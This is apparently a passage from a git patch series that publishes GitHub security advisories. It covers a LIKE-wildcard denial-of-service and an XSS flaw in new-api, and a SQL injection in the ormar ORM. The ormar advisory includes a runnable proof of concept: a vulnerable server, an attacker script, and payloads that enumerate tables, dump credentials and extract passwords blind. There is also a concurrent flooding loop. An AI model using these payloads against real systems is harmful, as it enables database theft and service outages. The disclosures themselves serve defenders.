'%_%_%_%_%_%', 'token': ''},\n cookies={'session': session_cookie},\n headers={'New-API-User': '1'}\n )\n\n# Launch 50 concurrent malicious requests\nwith ThreadPoolExecutor(max_workers=50) as executor:\n for _ in range(50):\n executor.submit(attack, '')\n```\n\n### Impact\n**Availability**\n\nRAM Overflow\n\n\"image\"\n\nPostgres unavailable\n\n\"image\"\n\n- Database CPU usage spike to 100%\n- Application memory exhaustion\n- Legitimate user requests blocked or significantly delayed\n- Potential application crash or database connection pool exhaustion\n\n### Database Performance\n\nTesting with 2,000,000 tokens:\n\n| Pattern | Query Time | Rows | Impact |\n|---------|-----------|------|--------|\n| `test` (normal) | ~50ms | 0 | Low |\n| `%` (full scan) | 5,973ms | 2,000,000 | High |\n| `%_%_%_%_%_%` | 6,200ms+ | 2,000,000 | Very High |\n\n### Attack Scalability\n\n- **Single attacker**: Can launch 10-50 concurrent requests easily\n- **Multiple accounts**: Attacker can register multiple accounts (if registration enabled)\n- **Proxy rotation**: IP-based rate limiting can be bypassed\n- **Persistence**: Attack can be sustained indefinitely\n\n### Resource Consumption\n\nEach malicious request with 2M results:\n- **Database**: ~6 seconds CPU time\n- **Network**: ~200MB data transfer\n- **Application Memory**: ~200MB+ for JSON serialization\n- **Connection Time**: Database connection held for entire query duration\n\n## Exploitation Scenario\n\n1. Attacker registers or compromises a regular user account\n2. Attacker crafts malicious LIKE patterns using `%` wildcards\n3. Attacker launches concurrent requests (50-200 concurrent)\n4. Database becomes overwhelmed with slow queries\n5. Application memory exhausts from processing large result sets\n6. Legitimate users experience service degradation or complete unavailability\n\n ## Patch Recommendations\n### 1. Escape LIKE Wildcards (Critical)\n```go\nfunc escapeLike(s string) string {\n s = strings.ReplaceAll(s, \"\\\\\", \"\\\\\\\\\")\n s = strings.ReplaceAll(s, \"%\", \"\\\\%\")\n s = strings.ReplaceAll(s, \"_\", \"\\\\_\")\n return s\n}\n\nfunc SearchUserTokens(userId int, keyword string, token string) (tokens []*Token, err error) {\n keyword = escapeLike(keyword)\n token = strings.Trim(token, \"sk-\")\n token = escapeLike(token)\n\n err = DB.Where(\"user_id = ?\", userId).\n Where(\"name LIKE ? ESCAPE '\\\\\\\\'\", \"%\"+keyword+\"%\").\n Where(commonKeyCol+\" LIKE ? ESCAPE '\\\\\\\\'\", \"%\"+token+\"%\").\n Limit(1000).\n Find(&tokens).Error\n return tokens, err\n}\n```\n\n### 2. Add User-Level Rate Limiting\n```go\ntokenRoute.GET(\"/search\",\n middleware.TokenSearchRateLimit(), // 30 req/min per user\n controller.SearchTokens)\n```\n\n### 3. Add Query Timeout\n```go\nctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)\ndefer cancel()\nerr = DB.WithContext(ctx).Where(...).Find(&tokens).Error\n```", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/QuantumNous/new-api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.10.8-alpha.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-w6x6-9fp7-fqm4" + }, + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/commit/3e1be18310f35d20742683ca9e4bf3bcafc173c5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/QuantumNous/new-api" + }, + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/releases/tag/v0.10.8-alpha.10" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-943" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T21:56:47Z", + "nvd_published_at": null + } +} \ No newline at end of file From ee45bba76db51221a79bf3a409dd1a3d880f0973 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:11:55 +0000 Subject: [PATCH 58/77] Publish GHSA-299v-8pq9-5gjq --- .../GHSA-299v-8pq9-5gjq.json | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-299v-8pq9-5gjq/GHSA-299v-8pq9-5gjq.json diff --git a/advisories/github-reviewed/2026/02/GHSA-299v-8pq9-5gjq/GHSA-299v-8pq9-5gjq.json b/advisories/github-reviewed/2026/02/GHSA-299v-8pq9-5gjq/GHSA-299v-8pq9-5gjq.json new file mode 100644 index 0000000000000..54c7a755fb1ba --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-299v-8pq9-5gjq/GHSA-299v-8pq9-5gjq.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-299v-8pq9-5gjq", + "modified": "2026-02-23T22:10:25Z", + "published": "2026-02-23T22:10:25Z", + "aliases": [ + "CVE-2026-25802" + ], + "summary": "New API has Potential XSS in its MarkdownRenderer component", + "details": "### Summary\n\nA potential unsafe operation occurs in component `MarkdownRenderer.jsx`, allowing for Cross-Site Scripting(XSS) when the model outputs items containing `\n\n\n\n```\n\n### Acknowledgments\n\nQuantumNous would like to thank **TechnologyStar** for the early notification of this potential vulnerability via AI-assisted tools, and **small-lovely-cat** for providing additional context and an initial patch. The final fix was developed and verified by the maintainers to ensure full compatibility with the project's architecture.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/QuantumNous/new-api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.10.8-alpha.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-299v-8pq9-5gjq" + }, + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/commit/ab5456eb1049aa8a0f3e51f359907ec7fff38b4b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/QuantumNous/new-api" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:10:25Z", + "nvd_published_at": null + } +} \ No newline at end of file From 131b18951d6e8b9900c6e4e39970c8f9d1dbeae7 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 22:13:41 +0000 Subject: [PATCH 59/77] Publish GHSA-xxh2-68g9-8jqr --- .../GHSA-xxh2-68g9-8jqr.json | 68 +++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-xxh2-68g9-8jqr/GHSA-xxh2-68g9-8jqr.json diff --git a/advisories/github-reviewed/2026/02/GHSA-xxh2-68g9-8jqr/GHSA-xxh2-68g9-8jqr.json b/advisories/github-reviewed/2026/02/GHSA-xxh2-68g9-8jqr/GHSA-xxh2-68g9-8jqr.json new file mode 100644 index 0000000000000..c593f3f840e21 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-xxh2-68g9-8jqr/GHSA-xxh2-68g9-8jqr.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xxh2-68g9-8jqr", + "modified": "2026-02-23T22:12:17Z", + "published": "2026-02-23T22:12:17Z", + "aliases": [ + "CVE-2026-26198" + ], + "summary": "ormar is vulnerable to SQL Injection through aggregate functions min() and max()", + "details": "# Report of SQL Injection Vulnerability in Ormar ORM\n\n## A SQL Injection attack can be achieved by passing a crafted string to the min() or max() aggregate functions.\n\n## Brief description\n\nWhen performing aggregate queries, Ormar ORM constructs SQL expressions by passing user-supplied column names directly into `sqlalchemy.text()` without any validation or sanitization. The `min()` and `max()` methods in the `QuerySet` class accept arbitrary string input as the column parameter. While `sum()` and `avg()` are partially protected by an `is_numeric` type check that rejects non-existent fields, `min()` and `max()` skip this validation entirely. As a result, an attacker-controlled string is embedded as raw SQL inside the aggregate function call. Any unauthorized user can exploit this vulnerability to read the entire database contents, including tables unrelated to the queried model, by injecting a subquery as the column parameter.\n\n## Affected versions\n\n```\n0.9.9 - 0.12.2\n0.20.0b1 - 0.22.0 (latest)\n```\n\nThe vulnerable `SelectAction.get_text_clause()` method and the `min()`/`max()` aggregate functions were introduced together in commit `ff9d412` (March 12, 2021) and first released in version **0.9.9**. The vulnerable code has never been modified since — `get_text_clause()` is identical in every subsequent version through the latest **0.21.0**.\n\nVersions prior to 0.9.9 do not contain the `min()`/`max()` aggregate feature and are not affected.\n\nThe following uses the latest ormar 0.21.0 as an example to illustrate the attack.\n\n## Vulnerability details\n\nWhen performing an aggregate query, the `QuerySet.max()` method (line 721, `queryset.py`) passes user input to `_query_aggr_function()`. This method creates a `SelectAction` object for each column name. The column string is split by `__` and the last part becomes `self.field_name` — with no validation against the model's actual fields.\n\nThe critical vulnerability is in `SelectAction.get_text_clause()` (line 41-43, `select_action.py`), which directly passes `self.field_name` into `sqlalchemy.text()`:\n\n```python\n#select_action.py line 41-43\ndef get_text_clause(self) -> sqlalchemy.sql.expression.TextClause:\n alias = f\"{self.table_prefix}_\" if self.table_prefix else \"\"\n return sqlalchemy.text(f\"{alias}{self.field_name}\") # unsanitised user input!\n```\n\nThe `apply_func()` method then wraps this raw text clause inside `func.max()`, producing SQL like `max()`. Since `sqlalchemy.text()` treats its argument as literal SQL, any subquery or SQL expression injected through the column name will be executed by the database engine.\n\nThe `_query_aggr_function()` method (line 704-719, `queryset.py`) only validates field types for `sum` and `avg`, leaving `min` and `max` completely unprotected:\n\n```python\n#queryset.py line 704-719\nasync def _query_aggr_function(self, func_name: str, columns: List) -> Any:\n func = getattr(sqlalchemy.func, func_name)\n select_actions = [\n SelectAction(select_str=column, model_cls=self.model) for column in columns\n ]\n if func_name in [\"sum\", \"avg\"]: # <-- only sum/avg are checked!\n if any(not x.is_numeric for x in select_actions):\n raise QueryDefinitionError(...)\n select_columns = [x.apply_func(func, use_label=True) for x in select_actions]\n expr = self.build_select_expression().alias(f\"subquery_for_{func_name}\")\n expr = sqlalchemy.select(*select_columns).select_from(expr)\n result = await self.database.fetch_one(expr)\n return dict(result) if len(result) > 1 else result[0]\n```\n\nTo reproduce the attack, you can follow the steps below, using a FastAPI application with SQLite as an example.\n\nNote: The PoC consists of two files provided in the attachments — `poc_server.py` (the vulnerable server) and `poc_attacker.py` (the HTTP-based attacker script).\n

Start the vulnerable application

\n
    \n
  1. Install dependencies:
    2. \n
\n
pip install ormar databases aiosqlite fastapi uvicorn httpx\n
\n
    \n
  1. The vulnerable server (poc_server.py) is based on the official ormar FastAPI example (ormar/examples/fastapi_quick_start.py). The only modification is the addition of a /items/stats endpoint — a common pattern for applications that provide aggregate statistics. This demonstrates that the vulnerability is easily triggered by natural API design.
    2. \n
\n

The server defines three models:

\n
    \n
  • Category and Item — from the official ormar example (unchanged)
    • \n
  • AdminUser — simulates internal data (e.g., an admin_users table) that should NOT be accessible through the public API
    • \n
\n

The vulnerable endpoint:

\n
# Added endpoint: aggregate statistics (VULNERABLE)\n# This is a common and natural pattern — letting users request\n# statistics on different columns. The ormar documentation itself\n# shows: await Book.objects.max(columns=["year"])\n# See: <https://collerek.github.io/ormar/queries/aggregations/>\n\n@app.get("/items/stats")\nasync def item_stats(\n    metric: str = Query("max", description="max or min"),\n    column: str = Query("price", description="Column to aggregate"),\n):\n    """Return aggregate statistics for items."""\n    if metric == "max":\n        result = await Item.objects.max(column)\n    elif metric == "min":\n        result = await Item.objects.min(column)\n    else:\n        return {"error": "Unsupported metric"}\n    return {"metric": metric, "column": column, "result": result}\n
\n

The database contains:

\n\nTable | Data\n-- | --\ncategories | Electronics\nitems | Laptop ($999.99), Phone ($699.99), Tablet ($449.99), Monitor ($329.99)\nadmin_users | root / Sup3r$ecretP@ss! / ak-9f8e7d6c5b4a3210-prod\n  | deploy-bot / ghp_Tx7KmR29vLp4QzN1bWcA3sYjDf80Ue5Xoi / ak-1a2b3c4d5e6f7890-ci\n\n\n

The admin_users table is NOT exposed via any API endpoint.

\n

The attack steps

\n

The PoC requires two terminals:

\n

Terminal 1 — Start the vulnerable server:

\n
python poc_server.py\n
\n

Terminal 2 — Run the attacker script:

\n
python poc_attacker.py\n
\n

The attacker script (poc_attacker.py) sends HTTP requests to the running server. It has NO prior knowledge of the database schema — all information is discovered through the injection. The attacker executes 6 progressive attack stages through the single /items/stats endpoint.

\n

Principle of vulnerability exploitation

\n

1. The attacker confirms injection by sending an arithmetic expression

\n

The attacker sends GET /items/stats?metric=max&column=1+1. The data flow is:

\n
HTTP request: GET /items/stats?metric=max&column=1+1\n    ↓\nitem_stats(metric="max", column="1+1")                # poc_server.py\n    ↓\nItem.objects.max("1+1")                                # queryset.py:721\n    ↓\n_query_aggr_function(func_name="max", columns=["1+1"]) # queryset.py:704\n    ↓\nSelectAction(select_str="1+1", model_cls=Item)          # select_action.py:22\n    ↓\n_split_value_into_parts("1+1")  →  self.field_name = "1+1"\n    ↓\n# min/max skip the is_numeric check (line 709 only checks sum/avg)\n    ↓\nget_text_clause()  →  sqlalchemy.text("1+1")            # select_action.py:43\n    ↓\napply_func(sqlalchemy.func.max)  →  max(1+1)\n
\n

Generated SQL:

\n
SELECT max(1+1) AS "1+1"\nFROM (SELECT items.id AS id, items.name AS name, items.price AS price,\n             items.category AS category\n      FROM items) AS subquery_for_max\n
\n

The API returns {"metric":"max","column":"1+1","result":2}, confirming that the arithmetic expression was evaluated as SQL.

\n

2. The attacker enumerates database tables

\n

The attacker injects a subquery to read sqlite_master:

\n
GET /items/stats?metric=max&column=(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')\n
\n

Which internally calls:

\n
await Item.objects.max(\n    "(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')"\n)\n
\n

Generated SQL:

\n
SELECT max((SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table'))\n       AS "(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')"\nFROM (SELECT items.id, items.name, items.price, items.category\n      FROM items) AS subquery_for_max\n
\n

The API returns categories,admin_users,items, revealing the hidden admin_users table.

\n

3. The attacker extracts the schema of the target table

\n
GET /items/stats?metric=max&column=(SELECT sql FROM sqlite_master WHERE name='admin_users')\n
\n

The API returns the full CREATE TABLE statement, revealing column names: username, password, api_key.

\n

4. The attacker dumps all credentials in a single query

\n
GET /items/stats?metric=max&column=(SELECT GROUP_CONCAT(username || ' | ' || password || ' | ' || api_key, CHAR(10)) FROM admin_users)\n
\n

Generated SQL:

\n
SELECT max((SELECT GROUP_CONCAT(username || ' | ' || password || ' | ' || api_key, CHAR(10))\n            FROM admin_users))\n       AS "..."\nFROM (SELECT items.id, items.name, items.price, items.category\n      FROM items) AS subquery_for_max\n
\n

The API returns all credentials:

\n
root | Sup3r$ecretP@ss! | ak-9f8e7d6c5b4a3210-prod\ndeploy-bot | ghp_Tx7KmR29vLp4QzN1bWcA3sYjDf80Ue5Xoi | ak-1a2b3c4d5e6f7890-ci\n
\n

5. Blind boolean-based extraction (when results are not directly visible)

\n

Even if the API does not return query results directly, the attacker can use boolean-based blind injection to extract data character by character using binary search:

\n
GET /items/stats?metric=max&column=CASE WHEN UNICODE(SUBSTR((SELECT password FROM admin_users WHERE username='root'),1,1))>83 THEN 1 ELSE 0 END\n
\n

Which internally calls:

\n
# "Is the Nth character of root's password greater than ASCII code M?"\nawait Item.objects.max(\n    "CASE WHEN UNICODE(SUBSTR("\n    "(SELECT password FROM admin_users WHERE username='root'),1,1))>83 "\n    "THEN 1 ELSE 0 END"\n)\n# Returns 0 → first character is 'S' (ASCII 83)\n
\n

By iterating over each position with binary search, the full password Sup3r$ecretP@ss! is extracted in approximately 113 HTTP requests (16 characters x ~7 binary search steps).

\n

6. The attacker extracts the production API key

\n
GET /items/stats?metric=max&column=(SELECT api_key FROM admin_users WHERE username='root')\n
\n

The API returns: ak-9f8e7d6c5b4a3210-prod

\n

All data was extracted through a single public API endpoint using only unauthenticated GET requests.

\n## Start the vulnerable application\n\n1. Install dependencies:\n\n```bash\npip install ormar databases aiosqlite fastapi uvicorn httpx\n```\n\n1. The vulnerable server (`poc_server.py`) is based on the **official ormar FastAPI example** ([[ormar/examples/fastapi_quick_start.py](https://github.com/collerek/ormar/blob/master/examples/fastapi_quick_start.py)](https://github.com/collerek/ormar/blob/master/examples/fastapi_quick_start.py)). The only modification is the addition of a `/items/stats` endpoint — a common pattern for applications that provide aggregate statistics. This demonstrates that the vulnerability is easily triggered by natural API design.\n\nThe server defines three models:\n\n- `Category` and `Item` — from the official ormar example (unchanged)\n- `AdminUser` — simulates internal data (e.g., an admin_users table) that should NOT be accessible through the public API\n\nThe vulnerable endpoint:\n\n```python\n# Added endpoint: aggregate statistics (VULNERABLE)\n# This is a common and natural pattern — letting users request\n# statistics on different columns. The ormar documentation itself\n# shows: await Book.objects.max(columns=[\"year\"])\n# See: \n\n@app.get(\"/items/stats\")\nasync def item_stats(\n metric: str = Query(\"max\", description=\"max or min\"),\n column: str = Query(\"price\", description=\"Column to aggregate\"),\n):\n \"\"\"Return aggregate statistics for items.\"\"\"\n if metric == \"max\":\n result = await Item.objects.max(column)\n elif metric == \"min\":\n result = await Item.objects.min(column)\n else:\n return {\"error\": \"Unsupported metric\"}\n return {\"metric\": metric, \"column\": column, \"result\": result}\n```\n\nThe database contains:\n\n| Table | Data |\n| --- | --- |\n| `categories` | Electronics |\n| `items` | Laptop ($999.99), Phone ($699.99), Tablet ($449.99), Monitor ($329.99) |\n| `admin_users` | root / Sup3r$ecretP@ss! / ak-9f8e7d6c5b4a3210-prod |\n| | deploy-bot / ghp_Tx7KmR29vLp4QzN1bWcA3sYjDf80Ue5Xoi / ak-1a2b3c4d5e6f7890-ci |\n\nThe `admin_users` table is **NOT** exposed via any API endpoint.\n\n## The attack steps\n\nThe PoC requires two terminals:\n\n**Terminal 1** — Start the vulnerable server:\n\n```bash\npython poc_server.py\n```\n\n**Terminal 2** — Run the attacker script:\n\n```bash\npython poc_attacker.py\n```\n\nThe attacker script (`poc_attacker.py`) sends HTTP requests to the running server. It has **NO prior knowledge** of the database schema — all information is discovered through the injection. The attacker executes 6 progressive attack stages through the single `/items/stats` endpoint.\n\n## Principle of vulnerability exploitation\n\n### 1. The attacker confirms injection by sending an arithmetic expression\n\nThe attacker sends `GET /items/stats?metric=max&column=1+1`. The data flow is:\n\n```\nHTTP request: GET /items/stats?metric=max&column=1+1\n ↓\nitem_stats(metric=\"max\", column=\"1+1\") # poc_server.py\n ↓\nItem.objects.max(\"1+1\") # queryset.py:721\n ↓\n_query_aggr_function(func_name=\"max\", columns=[\"1+1\"]) # queryset.py:704\n ↓\nSelectAction(select_str=\"1+1\", model_cls=Item) # select_action.py:22\n ↓\n_split_value_into_parts(\"1+1\") → self.field_name = \"1+1\"\n ↓\n# min/max skip the is_numeric check (line 709 only checks sum/avg)\n ↓\nget_text_clause() → sqlalchemy.text(\"1+1\") # select_action.py:43\n ↓\napply_func(sqlalchemy.func.max) → max(1+1)\n```\n\nGenerated SQL:\n\n```sql\nSELECT max(1+1) AS \"1+1\"\nFROM (SELECT items.id AS id, items.name AS name, items.price AS price,\n items.category AS category\n FROM items) AS subquery_for_max\n```\n\nThe API returns `{\"metric\":\"max\",\"column\":\"1+1\",\"result\":2}`, confirming that the arithmetic expression was evaluated as SQL.\n\n### 2. The attacker enumerates database tables\n\nThe attacker injects a subquery to read `sqlite_master`:\n\n```\nGET /items/stats?metric=max&column=(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')\n```\n\nWhich internally calls:\n\n```python\nawait Item.objects.max(\n \"(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')\"\n)\n```\n\nGenerated SQL:\n\n```sql\nSELECT max((SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table'))\n AS \"(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')\"\nFROM (SELECT items.id, items.name, items.price, items.category\n FROM items) AS subquery_for_max\n```\n\nThe API returns `categories,admin_users,items`, revealing the hidden `admin_users` table.\n\n### 3. The attacker extracts the schema of the target table\n\n```\nGET /items/stats?metric=max&column=(SELECT sql FROM sqlite_master WHERE name='admin_users')\n```\n\nThe API returns the full `CREATE TABLE` statement, revealing column names: `username`, `password`, `api_key`.\n\n### 4. The attacker dumps all credentials in a single query\n\n```\nGET /items/stats?metric=max&column=(SELECT GROUP_CONCAT(username || ' | ' || password || ' | ' || api_key, CHAR(10)) FROM admin_users)\n```\n\nGenerated SQL:\n\n```sql\nSELECT max((SELECT GROUP_CONCAT(username || ' | ' || password || ' | ' || api_key, CHAR(10))\n FROM admin_users))\n AS \"...\"\nFROM (SELECT items.id, items.name, items.price, items.category\n FROM items) AS subquery_for_max\n```\n\nThe API returns all credentials:\n\n```\nroot | Sup3r$ecretP@ss! | ak-9f8e7d6c5b4a3210-prod\ndeploy-bot | ghp_Tx7KmR29vLp4QzN1bWcA3sYjDf80Ue5Xoi | ak-1a2b3c4d5e6f7890-ci\n```\n\n### 5. Blind boolean-based extraction (when results are not directly visible)\n\nEven if the API does not return query results directly, the attacker can use boolean-based blind injection to extract data character by character using binary search:\n\n```\nGET /items/stats?metric=max&column=CASE WHEN UNICODE(SUBSTR((SELECT password FROM admin_users WHERE username='root'),1,1))>83 THEN 1 ELSE 0 END\n```\n\nWhich internally calls:\n\n```python\n# \"Is the Nth character of root's password greater than ASCII code M?\"\nawait Item.objects.max(\n \"CASE WHEN UNICODE(SUBSTR(\"\n \"(SELECT password FROM admin_users WHERE username='root'),1,1))>83 \"\n \"THEN 1 ELSE 0 END\"\n)\n# Returns 0 → first character is 'S' (ASCII 83)\n```\n\nBy iterating over each position with binary search, the full password `Sup3r$ecretP@ss!` is extracted in approximately 113 HTTP requests (16 characters x ~7 binary search steps).\n\n### 6. The attacker extracts the production API key\n\n```\nGET /items/stats?metric=max&column=(SELECT api_key FROM admin_users WHERE username='root')\n```\n\nThe API returns: `ak-9f8e7d6c5b4a3210-prod`\n\nAll data was extracted through a single public API endpoint using only unauthenticated GET requests.\n## The complete POC\n\n### poc_server.py (Vulnerable Server)\n\nBased on the official ormar FastAPI example ([[fastapi_quick_start.py](https://github.com/collerek/ormar/blob/master/examples/fastapi_quick_start.py)](https://github.com/collerek/ormar/blob/master/examples/fastapi_quick_start.py)):\n\n```python\n\"\"\"\nCVE PoC — Vulnerable Server\n=============================\nBased on the OFFICIAL ormar FastAPI example:\n \n\nThe only modification is the addition of a /items/stats endpoint (line 63-76),\nwhich is a common pattern for any application that provides aggregate statistics.\n\nUsage:\n python poc_server.py\n\"\"\"\n\n# ── Original official example code (unchanged) ───────────────\n# Source: ormar/examples/fastapi_quick_start.py\n\nfrom contextlib import asynccontextmanager\nfrom typing import List, Optional\n\nimport databases\nimport ormar\nimport sqlalchemy\nimport uvicorn\nfrom fastapi import FastAPI, Query\n\nDATABASE_URL = \"sqlite:///poc_vuln.db\"\n\normar_base_config = ormar.OrmarConfig(\n database=databases.Database(DATABASE_URL), metadata=sqlalchemy.MetaData()\n)\n\nclass Category(ormar.Model):\n ormar_config = ormar_base_config.copy(tablename=\"categories\")\n\n id: int = ormar.Integer(primary_key=True)\n name: str = ormar.String(max_length=100)\n\nclass Item(ormar.Model):\n ormar_config = ormar_base_config.copy(tablename=\"items\")\n\n id: int = ormar.Integer(primary_key=True)\n name: str = ormar.String(max_length=100)\n price: float = ormar.Float(default=0)\n category: Optional[Category] = ormar.ForeignKey(Category, nullable=True)\n\n# This table simulates internal data that should NOT be accessible\n# through the public API — e.g. an admin_users table in the same database.\nclass AdminUser(ormar.Model):\n ormar_config = ormar_base_config.copy(tablename=\"admin_users\")\n\n id: int = ormar.Integer(primary_key=True)\n username: str = ormar.String(max_length=100)\n password: str = ormar.String(max_length=200)\n api_key: str = ormar.String(max_length=200)\n\n@asynccontextmanager\nasync def lifespan(app: FastAPI):\n database_ = ormar_base_config.database\n if not database_.is_connected:\n await database_.connect()\n\n # Create tables\n engine = sqlalchemy.create_engine(DATABASE_URL)\n ormar_base_config.metadata.create_all(engine)\n engine.dispose()\n\n # Seed sample data\n if not await Item.objects.count():\n cat = await Category.objects.create(name=\"Electronics\")\n await Item.objects.create(name=\"Laptop\", price=999.99, category=cat)\n await Item.objects.create(name=\"Phone\", price=699.99, category=cat)\n await Item.objects.create(name=\"Tablet\", price=449.99, category=cat)\n await Item.objects.create(name=\"Monitor\", price=329.99, category=cat)\n\n if not await AdminUser.objects.count():\n await AdminUser.objects.create(\n username=\"root\",\n password=\"Sup3r$ecretP@ss!\",\n api_key=\"ak-9f8e7d6c5b4a3210-prod\",\n )\n await AdminUser.objects.create(\n username=\"deploy-bot\",\n password=\"ghp_Tx7KmR29vLp4QzN1bWcA3sYjDf80Ue5Xoi\",\n api_key=\"ak-1a2b3c4d5e6f7890-ci\",\n )\n\n print(\"\\\\n [Server] Ready. Database seeded with items + admin_users.\")\n print(\" [Server] The admin_users table is NOT exposed via any API endpoint.\\\\n\")\n\n yield\n\n if database_.is_connected:\n await database_.disconnect()\n\napp = FastAPI(\n title=\"Item Catalog API\",\n description=\"Based on official ormar FastAPI example\",\n lifespan=lifespan,\n)\n\n# ── Original endpoints from official example (unchanged) ──────\n\n@app.get(\"/items/\", response_model=List[Item])\nasync def get_items():\n items = await Item.objects.select_related(\"category\").all()\n return items\n\n@app.post(\"/items/\", response_model=Item)\nasync def create_item(item: Item):\n await item.save()\n return item\n\n@app.post(\"/categories/\", response_model=Category)\nasync def create_category(category: Category):\n await category.save()\n return category\n\n@app.put(\"/items/{item_id}\")\nasync def get_item(item_id: int, item: Item):\n item_db = await Item.objects.get(pk=item_id)\n return await item_db.update(**item.model_dump())\n\n@app.delete(\"/items/{item_id}\")\nasync def delete_item(item_id: int, item: Item = None):\n if item:\n return {\"deleted_rows\": await item.delete()}\n item_db = await Item.objects.get(pk=item_id)\n return {\"deleted_rows\": await item_db.delete()}\n\n# ── Added endpoint: aggregate statistics (VULNERABLE) ─────────\n# This is a common and natural pattern — letting users request\n# statistics on different columns. The ormar documentation itself\n# shows: await Book.objects.max(columns=[\"year\"])\n# See: \n\n@app.get(\"/items/stats\")\nasync def item_stats(\n metric: str = Query(\"max\", description=\"max or min\"),\n column: str = Query(\"price\", description=\"Column to aggregate\"),\n):\n \"\"\"Return aggregate statistics for items.\"\"\"\n if metric == \"max\":\n result = await Item.objects.max(column)\n elif metric == \"min\":\n result = await Item.objects.min(column)\n else:\n return {\"error\": \"Unsupported metric\"}\n return {\"metric\": metric, \"column\": column, \"result\": result}\n\n@app.get(\"/health\")\nasync def health():\n return {\"status\": \"ok\"}\n\n# ── Main ──────────────────────────────────────────────────────\nif __name__ == \"__main__\":\n import os\n # Clean previous database for reproducibility\n if os.path.exists(\"poc_vuln.db\"):\n os.unlink(\"poc_vuln.db\")\n print(\"=\" * 60)\n print(\" CVE PoC — Vulnerable Server\")\n print(\" Based on: ormar/examples/fastapi_quick_start.py\")\n print(\" Added: GET /items/stats?metric=max&column=\")\n print(\" Docs: \")\n print(\"=\" * 60)\n uvicorn.run(app, host=\"127.0.0.1\", port=8000, log_level=\"warning\")\n```\n\n### poc_attacker.py (Attacker Script)\n\n```python\n\"\"\"\nCVE PoC — Attacker Script\n===========================\nExploits the SQL injection in /items/stats endpoint.\nSends HTTP requests to the running FastAPI server.\n\nPrerequisites:\n 1. Start the server first: python poc_server.py\n 2. Then run this script: python poc_attacker.py\n\nThe attacker has NO prior knowledge of the database schema.\nAll information is discovered through the injection.\n\"\"\"\n\nimport sys\nimport httpx\n\nTARGET = \"\"\nENDPOINT = \"/items/stats\"\n\ndef inject(payload: str) -> str:\n \"\"\"Send a single injection payload via the public API.\"\"\"\n resp = httpx.get(TARGET + ENDPOINT, params={\"metric\": \"max\", \"column\": payload})\n data = resp.json()\n return data.get(\"result\")\n\ndef main():\n # ── Pre-check ─────────────────────────────────────────────\n try:\n r = httpx.get(TARGET + \"/health\", timeout=3)\n if r.status_code != 200:\n sys.exit(1)\n except httpx.ConnectError:\n print(f\"Cannot connect to {TARGET}\")\n print(f\"Start the server first: python poc_server.py\")\n sys.exit(1)\n\n # ── Stage 0: Legitimate request ──────────────────────────\n result = inject(\"price\")\n print(f\"[Stage 0] Normal usage: max(price) = {result}\")\n\n # ── Stage 1: Confirm injection ────────────────────────────\n result = inject(\"1+1\")\n print(f\"[Stage 1] max('1+1') = {result}\")\n if result == 2:\n print(\" → SQL INJECTION CONFIRMED\")\n\n # ── Stage 2: Enumerate tables ─────────────────────────────\n payload = \"(SELECT GROUP_CONCAT(name) FROM sqlite_master WHERE type='table')\"\n result = inject(payload)\n tables = str(result).split(\",\") if result else []\n print(f\"[Stage 2] Tables: {result}\")\n\n # ── Stage 3: Extract schema ───────────────────────────────\n target_table = [t for t in tables if \"admin\" in t.lower()]\n target_table = target_table[0] if target_table else tables[-1]\n payload = f\"(SELECT sql FROM sqlite_master WHERE name='{target_table}')\"\n result = inject(payload)\n print(f\"[Stage 3] Schema of {target_table}: {result}\")\n\n # ── Stage 4: Dump all credentials ─────────────────────────\n payload = (\n f\"(SELECT GROUP_CONCAT(\"\n f\"username || ' | ' || password || ' | ' || api_key, CHAR(10))\"\n f\" FROM {target_table})\"\n )\n result = inject(payload)\n print(f\"[Stage 4] Credentials:\\\\n{result}\")\n\n # ── Stage 5: Blind extraction ─────────────────────────────\n payload = 